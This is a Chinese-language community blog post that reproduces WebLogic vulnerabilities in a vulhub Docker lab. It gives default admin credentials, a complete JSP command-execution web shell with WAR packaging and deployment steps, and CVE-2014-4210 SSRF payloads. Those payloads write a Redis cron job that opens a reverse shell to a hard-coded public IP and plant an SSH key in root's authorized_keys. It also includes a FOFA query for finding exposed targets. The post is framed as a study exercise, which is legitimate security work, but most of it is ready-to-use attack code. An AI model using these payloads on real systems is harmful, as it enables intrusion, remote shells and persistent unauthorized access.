漏洞复现 - - - Weblogic漏洞

举报
yd_217360808 发表于 2022/10/21 21:56:01 2022/10/21
【摘要】 本文章主要讲述了Weblogic漏洞的搭建及其复现过程。

一,Weblogic简介

WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。 WebLogic是美商Oracle的主要产品之一,是并购BEA得来。是商业市场上主要的Java(J2EE)应用服务器软件(application server)之一,是世界上第一个成功商业化的J2EE应用服务器, 已推出到12c(12.2.1.4) 版。而此产品也延伸出WebLogic Portal,WebLogic Integration等企业用的中间件(但当下Oracle主要以Fusion Middleware融合中间件来取代这些WebLogic Server之外的企业包),以及OEPE(Oracle Enterprise Pack for Eclipse)开发工具。

二,Weblogic漏洞环境搭建

docker pull vulhub/weblogic:10.3.6.0-2017 

docker run -dit -p 7001:7001 vulhub/weblogic:10.3.6.0-2017

访问:http://kali IP://7001/console

 三,Weblogic弱口令

Weblogic 存在 默认口令漏洞:
可通过 https://cirt.net/passwords?criteria=weblogic 网站进行查询Weblogic弱口令最终可以得到管理员密码。
账号: weblogic
密码: Oracle@123
 有了管理员账户我们就要想办法上传一个war包,下面是一个jsp格式(主要此jsp不可用蚁剑连接,可以自己用蚁剑生成一个war包,然后安装下列步骤上传) 
<%@ page import="java.io.*" %> <% String cmd = request.getParameter("cmd"); String output = ""; if(cmd != null) { String s = null; try { Process p = Runtime.getRuntime().exec(cmd); BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream())); 
while((s = sI.readLine()) != null) { output += s +"\r\n"; } } 
catch(IOException e) { e.printStackTrace(); } } 
out.println(output);%>
对jsp进行war包打包
jar -cvf cmd.war cmd.jsp
所示
点击浏览上传war包,点击下一步
 如同就是war包的路径
访问如下路径可以获得getshell
 http://kali IP://7001/cmd/cmd.jsp?cmd=ls
 查看cmd就可以看到文件路径

 四,CVE-2014-4210

漏洞环境

FOFA搜app="Weblogic_interface_7001"

漏洞危害

Weblogic 漏洞生于 /uddiexplorer/SearchPublicRegistries.jsp 页面中,可以导致
SSRF ,用来攻击内网中一些 redis  fastcgi 之类的脆弱组件

漏洞复现

http://your-IP:7001/uddiexplorer/SearchPublicRegistries.jsp

 

进行内网存活探测

http://your-IP:7001/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name

使用max hackber,发送post请求

&txtSearchname=sdf
&txtSearchkey=
&txtSearchfor=
&selfor=Business+location
&btnSubmit=Search
&operator=http://your-IP:9090

  http 端口存活的时候就会显示 404 not found 

尝试一个不存活的主机就是 No route to host  

 探测6379端口

SSRF攻击内网Redis

 写定时任务

/uddiexplorer/SearchPublicRegistries.jsp?
operator=http://172.18.0.1:6379/test%0D%0A%0D%0Aset%20x%20%22%5Cn%5Cn%5Cn%5Cn*%2F1%20*%20*%20*%20*%20%2Fbin%2Fbash%20-i%20>%26%20%2Fdev%2Ftcp%2F47.101.214.85%2F1234%200>%261%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Fvar%2Fspool%2Fcron%2Fcrontabs%2F%0D%0Aconfig%20set%20dbfilename%20root%0D%0Asave%0D%0A%0D%0Aaaa&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search

 SSH公钥

/uddiexplorer/SearchPublicRegistries.jsp?
operator=http://172.18.0.1:6379/test%0D%0A%0D%0Aset%20xx%20%22%5Cn%5Cn%5Cn%5Cnsshrsa%20AAAAB3NzaC1yc2EAAAADAQABAAABAQDV14i/SITCBQjzb%2B8xL0vwGwKjnMEQiarTxdVokFToK0Xw99m0eJwKV3WcTQgSykHA2rFxbQw%2Fv9IVx89bAzX0iOBAU8jF%2B9oH5KE9KBzM%2FT1Vr3DDwmNny2qYCfizO9jJ90fr3DUeXWwl%2BD24XiKfkDzlDly9LgEYxXl%2FCIgZ91QcTA0UeSBLXCgigVLKhDNZGGBqMFrGNUsj0esNJr7pJsYEnIn%2BN5BtnUWEce1KERlGDiwvzRpyFvOKgQpEAiS%2BR781GSsAsJsCQz8OFge6lx0iSMNZ6TWjkQYKlnTkQvzOo%2FZhINtItYziRXJKmNQLdPpQ7OYo2WOQ4TIDFtR5%20root@iZuf6jc5pa52ijq06q5f1lZ%5Cn%5Cn%5Cn%5Cn%22%0D%0Aconfig%20set%20dir%20%2Froot%2F.ssh%0D%0Aconfig%20set%20dbfilename%20authorized_keys%0D%0Asave%0D%0A%0D%0Aaaa&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business%2Blocation&btnSubmit=Search


【版权声明】本文为华为云社区用户原创内容,转载时必须标注文章的来源(华为云社区)、文章链接、文章作者等基本信息, 否则作者和本社区有权追究责任。如果您发现本社区中有涉嫌抄袭的内容,欢迎发送邮件进行举报,并提供相关证据,一经查实,本社区将立刻删除涉嫌侵权内容,举报邮箱: cloudbbs@huaweicloud.com
数据安全中心 DSC 通用安全
  • 点赞
  • 收藏
  • 关注作者

评论(0

0/1000
抱歉,系统识别当前为高风险访问,暂不支持该操作

全部回复

上滑加载中

设置昵称

在此一键设置昵称,即可参与社区互动!

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。

确认 取消

加入云驻计划,成为创作者

  • 华为云周边好礼
  • 免费体验产品
  • 特殊身份标识
  • 线下官方门票
  • 内部专家零距离
  • 与10000+优质创作者共同成长
立即加入